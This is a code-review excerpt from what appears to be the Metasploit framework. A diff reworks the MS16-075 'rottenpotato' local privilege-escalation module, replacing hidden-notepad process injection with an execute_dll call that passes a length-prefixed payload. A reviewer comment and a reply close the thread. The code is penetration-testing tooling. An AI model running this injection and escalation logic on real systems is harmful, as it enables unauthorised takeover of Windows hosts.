modules/exploits/windows/local/ms16_075_reflection.rb

```diff
@@ -118,26 +118,17 @@ def exploit
     else
       fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
     end
-    print_status('Launching notepad to host the exploit...')
-    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
-    begin
-      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
-      print_good("Process #{process.pid} launched.")
-    rescue Rex::Post::Meterpreter::RequestError
-      print_error('Operation failed. Trying to elevate the current process...')
-      process = client.sys.process.open
-    end
-    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name)
-    library_path = ::File.expand_path(library_path)
-    print_status("Injecting exploit into #{process.pid}...")
-    exploit_mem, offset = inject_dll_into_process(process, library_path)
-    print_status("Exploit injected. Injecting payload into #{process.pid}...")
-    payload_mem = inject_into_process(process, payload.encoded)
+
+    print_status("Reflectively injecting the exploit DLL and triggering the exploit...")
+
     # invoke the exploit, passing in the address of the payload that
     # we want invoked on successful exploitation.
-    print_status('Payload injected. Executing exploit...')
-    process.thread.create(exploit_mem + offset, payload_mem)
+    encoded_payload = payload.encoded
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name),
+      [encoded_payload.length].pack('I<') + encoded_payload
```

Comment:
This does not look like the payload is expecting the length to be prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b